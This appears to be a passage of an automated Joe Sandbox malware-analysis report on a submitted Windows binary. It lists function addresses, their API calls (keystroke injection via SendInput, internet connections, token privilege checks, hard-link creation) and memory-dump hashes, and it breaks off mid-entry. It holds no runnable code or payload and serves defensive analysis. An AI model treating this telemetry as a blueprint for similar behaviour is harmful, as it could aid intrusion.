                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: FromProg$FreeTask_memcmp
                                          • String ID:
                                          • API String ID: 314563124-0
                                          • Opcode ID: 1a59445ebf28d3a0eec315aadf0fdea91843f1442a4a4abb3bfb11ee9df26241
                                          • Instruction ID: bc77878bfd5e67bf125661c3a9c1e3beb460b46aa9742e3d9c86a1fc7f4f214a
                                          • Opcode Fuzzy Hash: 1a59445ebf28d3a0eec315aadf0fdea91843f1442a4a4abb3bfb11ee9df26241
                                          • Instruction Fuzzy Hash: 19811971A00119EFCB04DFA4D984EEEB7B9FF89315F204598E546BB250DB71AE05CB60
                                          Function 00E26DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Variant$AllocClearCopyInitString
                                          • String ID:
                                          • API String ID: 2808897238-0
                                          • Opcode ID: d3c635a97c682a4809329548b999981da4363b5bbe0b184d8d6f70448caf47e0
                                          • Instruction ID: fa8539cf635eb0a6910af391ee9ebc82334904d2424a0e470f504c6730bd19be
                                          • Opcode Fuzzy Hash: d3c635a97c682a4809329548b999981da4363b5bbe0b184d8d6f70448caf47e0
                                          • Instruction Fuzzy Hash: FA51C6307043119EDB34AF66F895E6AF3E5EF48310F24A81FE596EB291DB709844DB21
                                          Function 00E59A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetWindowRect.USER32(00F7E288,?), ref: 00E59AD2
                                          • ScreenToClient.USER32(00000002,00000002), ref: 00E59B05
                                          • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00E59B72
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Window$ClientMoveRectScreen
                                          • String ID:
                                          • API String ID: 3880355969-0
                                          • Opcode ID: cadd37cb9891586567d360c81df436e000a861c86f77ed0e891a4bdafde2454b
                                          • Instruction ID: b8b21e86ab4f74f90b10c2d6f67966f7e22f15afeaa45ea5ecf900a90dd96e60
                                          • Opcode Fuzzy Hash: cadd37cb9891586567d360c81df436e000a861c86f77ed0e891a4bdafde2454b
                                          • Instruction Fuzzy Hash: 16514D34A00209EFDF24CF68D980AEE7BB5FB44365F14895AFC15AB291D730AD45CB90
                                          Function 00E3BA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00E3BB09
                                          • GetLastError.KERNEL32(?,00000000), ref: 00E3BB2F
                                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00E3BB54
                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00E3BB80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                          • String ID:
                                          • API String ID: 3321077145-0
                                          • Opcode ID: c78ec21abe531909e2b13706827314566ba308de03383404dcd9317050bbf130
                                          • Instruction ID: 4f5f4a3eddd03f41762225373537fbaa046380131fc0b73e6384d06ac576a1eb
                                          • Opcode Fuzzy Hash: c78ec21abe531909e2b13706827314566ba308de03383404dcd9317050bbf130
                                          • Instruction Fuzzy Hash: F3411C39200610DFCB10EF25C598A59FBE1EF49314F09A499F94AAB362CB35FD01CBA1
                                          Function 00E58AC0 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                          Download Yara Rule
                                          APIs
                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E58B4D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: InvalidateRect
                                          • String ID:
                                          • API String ID: 634782764-0
                                          • Opcode ID: a46e9004612d588727cb5858646ceba9013ca0800c9ab0f981dffced0f46936c
                                          • Instruction ID: c1c2c062ca743fdf0d70db2fb8843b7bfe089b65171b0dd43c50cf9ac5dcc4ea
                                          • Opcode Fuzzy Hash: a46e9004612d588727cb5858646ceba9013ca0800c9ab0f981dffced0f46936c
                                          • Instruction Fuzzy Hash: 5C31E378600204BFEFA49E18CE55FA937A9EB05356F245E13FE41F62A1DE30AD488651
                                          Function 00E5ADF1 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • ClientToScreen.USER32(?,?), ref: 00E5AE1A
                                          • GetWindowRect.USER32(?,?), ref: 00E5AE90
                                          • PtInRect.USER32(?,?,00E5C304), ref: 00E5AEA0
                                          • MessageBeep.USER32(00000000), ref: 00E5AF11
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Rect$BeepClientMessageScreenWindow
                                          • String ID:
                                          • API String ID: 1352109105-0
                                          • Opcode ID: 190510f7af80e69d53ef06d78ba7d5488ce42673fe29257c65700ed57680d895
                                          • Instruction ID: 3960483a1decc23d76e06528812c61bee335850f17b305fcbac2f7f18a415c82
                                          • Opcode Fuzzy Hash: 190510f7af80e69d53ef06d78ba7d5488ce42673fe29257c65700ed57680d895
                                          • Instruction Fuzzy Hash: 8E41C270600209DFCB15CF59C885A997BF5FB48342F18967AEC15BB250DB30A849CF62
                                          Function 00E30FE6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00E31037
                                          • SetKeyboardState.USER32(00000080,?,00000001), ref: 00E31053
                                          • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00E310B9
                                          • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00E3110B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: KeyboardState$InputMessagePostSend
                                          • String ID:
                                          • API String ID: 432972143-0
                                          • Opcode ID: baec725a94a1a8561c72789d4b6dc5f30c8acfccf2bb7715968987a74fed9a01
                                          • Instruction ID: 1b18fdb46f41c69d1e78d9501ae514fc85258bd2a5012aed70bb6f31f4ef70bb
                                          • Opcode Fuzzy Hash: baec725a94a1a8561c72789d4b6dc5f30c8acfccf2bb7715968987a74fed9a01
                                          • Instruction Fuzzy Hash: 95315930E40688AEFF388A268C0D7FDBFA9AB48314F04529EE590721D0C3748DD4CB51
                                          Function 00E31121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00E31176
                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 00E31192
                                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 00E311F1
                                          • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00E31243
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: KeyboardState$InputMessagePostSend
                                          • String ID:
                                          • API String ID: 432972143-0
                                          • Opcode ID: ca260110cca553f5db153843f3c635a0e637959df1f73d285ff207af8e92b7f0
                                          • Instruction ID: e74971f1cc4738441176ececd676d32800e4c30afec3bf61c9d5502fff2282a7
                                          • Opcode Fuzzy Hash: ca260110cca553f5db153843f3c635a0e637959df1f73d285ff207af8e92b7f0
                                          • Instruction Fuzzy Hash: 933148309453589EEF348A668C1C7FE7FAAAB89314F04639EF590B21E1C3744954D761
                                          Function 00E06415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00E0644B
                                          • __isleadbyte_l.LIBCMT ref: 00E06479
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00E064A7
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00E064DD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                          • String ID:
                                          • API String ID: 3058430110-0
                                          • Opcode ID: 9153b4fa9c1251dd1900bab97e26b14a96c0413cecf63d95986d7adc80e75e02
                                          • Instruction ID: a45d3ff4352d53941eb7b36464ad0b3c5efd979f5a90ed040ab81bae1d0f6e24
                                          • Opcode Fuzzy Hash: 9153b4fa9c1251dd1900bab97e26b14a96c0413cecf63d95986d7adc80e75e02
                                          • Instruction Fuzzy Hash: 3A31EF3160025AAFDB218F75CC84BBA7BA5FF40324F155429F864A71E1EB31D8A0DBA0
                                          Function 00E55175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetForegroundWindow.USER32 ref: 00E55189
                                            • Part of subcall function 00E3387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00E33897
                                            • Part of subcall function 00E3387D: GetCurrentThreadId.KERNEL32 ref: 00E3389E
                                            • Part of subcall function 00E3387D: AttachThreadInput.USER32(00000000,?,00E352A7), ref: 00E338A5
                                          • GetCaretPos.USER32(?), ref: 00E5519A
                                          • ClientToScreen.USER32(00000000,?), ref: 00E551D5
                                          • GetForegroundWindow.USER32 ref: 00E551DB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                          • String ID:
                                          • API String ID: 2759813231-0
                                          • Opcode ID: ce9c682d018a7c1a9a963b0196bd0b47f65eb946c24d2248c337d2b717e052cc
                                          • Instruction ID: 9b2553931c3bc2854d955d89bf121f3a522c1cbf9c52f1548e8070bac48079e4
                                          • Opcode Fuzzy Hash: ce9c682d018a7c1a9a963b0196bd0b47f65eb946c24d2248c337d2b717e052cc
                                          • Instruction Fuzzy Hash: 3D311C72900218AFDB04EFA5C895EEFF7F9EF98304F10546AE415E7241EA759E05CBA0
                                          Function 00DF0BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                          Download Yara Rule
                                          APIs
                                          • __setmode.LIBCMT ref: 00DF0BF2
                                            • Part of subcall function 00DD5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00E37B20,?,?,00000000), ref: 00DD5B8C
                                            • Part of subcall function 00DD5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00E37B20,?,?,00000000,?,?), ref: 00DD5BB0
                                          • _fprintf.LIBCMT ref: 00DF0C29
                                          • OutputDebugStringW.KERNEL32(?), ref: 00E26331
                                            • Part of subcall function 00DF4CDA: _flsall.LIBCMT ref: 00DF4CF3
                                          • __setmode.LIBCMT ref: 00DF0C5E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                          • String ID:
                                          • API String ID: 521402451-0
                                          • Opcode ID: 037c796b07c625949a5e298b4dab08d3f4b6242d293dc24f548fdc5e55e5286e
                                          • Instruction ID: 229d8817d226dd78a27bf8cc543e88fc9ce43b12aa89b0a51697bd2ab938cfb8
                                          • Opcode Fuzzy Hash: 037c796b07c625949a5e298b4dab08d3f4b6242d293dc24f548fdc5e55e5286e
                                          • Instruction Fuzzy Hash: A3112432A0420CBACB04B7B5AC469BEBB69DF85320F15811AF30467292DE615D8687B1
                                          Function 00E28B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E28652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E28669
                                            • Part of subcall function 00E28652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E28673
                                            • Part of subcall function 00E28652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E28682
                                            • Part of subcall function 00E28652: RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00E28689
                                            • Part of subcall function 00E28652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E2869F
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00E28BEB
                                          • _memcmp.LIBCMT ref: 00E28C0E
                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E28C44
                                          • HeapFree.KERNEL32(00000000), ref: 00E28C4B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Heap$InformationProcessToken$AllocateErrorFreeLastLookupPrivilegeValue_memcmp
                                          • String ID:
                                          • API String ID: 2182266621-0
                                          • Opcode ID: 183a53b1601bb875f1d52c3482ca7242da7b02a92f16f264f7938f1b6d439562
                                          • Instruction ID: 4ea642253cbb6a9552a8169844e66428551e155efc29a10e7533983cd0b0eea8
                                          • Opcode Fuzzy Hash: 183a53b1601bb875f1d52c3482ca7242da7b02a92f16f264f7938f1b6d439562
                                          • Instruction Fuzzy Hash: 97219A71E02218EFDB04DFA4DA46BEEF7B8EF50359F184099E454B7240DB30AA06CB61
                                          Function 00E41A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00E41A97
                                            • Part of subcall function 00E41B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E41B40
                                            • Part of subcall function 00E41B21: InternetCloseHandle.WININET(00000000), ref: 00E41BDD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Internet$CloseConnectHandleOpen
                                          • String ID:
                                          • API String ID: 1463438336-0
                                          • Opcode ID: 400881c6a0574e7079c50f1606a7d64e10c586576d02cfb0571ebe37c9524024
                                          • Instruction ID: dd0ee1d391b1d761a8e2880b07bc412d1fcfd90c7426d75a6e10b3703dfcfd05
                                          • Opcode Fuzzy Hash: 400881c6a0574e7079c50f1606a7d64e10c586576d02cfb0571ebe37c9524024
                                          • Instruction Fuzzy Hash: F621CF31200700BFDF169F60EC04FBABBA9FF88701F10145EFA51A6650EB31E854ABA0
                                          Function 00E2E1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E2F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00E2E1C4,?,?,?,00E2EFB7,00000000,000000EF,00000119,?,?), ref: 00E2F5BC
                                            • Part of subcall function 00E2F5AD: lstrcpyW.KERNEL32(00000000,?,?,00E2E1C4,?,?,?,00E2EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00E2F5E2
                                            • Part of subcall function 00E2F5AD: lstrcmpiW.KERNEL32(00000000,?,00E2E1C4,?,?,?,00E2EFB7,00000000,000000EF,00000119,?,?), ref: 00E2F613
                                          • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00E2EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00E2E1DD
                                          • lstrcpyW.KERNEL32(00000000,?,?,00E2EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00E2E203
                                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,00E2EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00E2E237
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: lstrcmpilstrcpylstrlen
                                          • String ID: cdecl
                                          • API String ID: 4031866154-3896280584
                                          • Opcode ID: 976ba2514e4abfa62131320d89f3dd20e67993590d1f3cd79e255ea68739da0a
                                          • Instruction ID: aac0a7490019193341c9c91236913b97294477f2e84997916d7c2a54befdf202
                                          • Opcode Fuzzy Hash: 976ba2514e4abfa62131320d89f3dd20e67993590d1f3cd79e255ea68739da0a
                                          • Instruction Fuzzy Hash: 4711B137100365EFCB29AF74E84597A77B8FF44310B40902AE806DB260EF719850C7A0
                                          Function 00E05332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 00E05351
                                            • Part of subcall function 00DF594C: __FF_MSGBANNER.LIBCMT ref: 00DF5963
                                            • Part of subcall function 00DF594C: __NMSG_WRITE.LIBCMT ref: 00DF596A
                                            • Part of subcall function 00DF594C: RtlAllocateHeap.NTDLL(00F60000,00000000,00000001), ref: 00DF598F
                                          Memory Dump Source
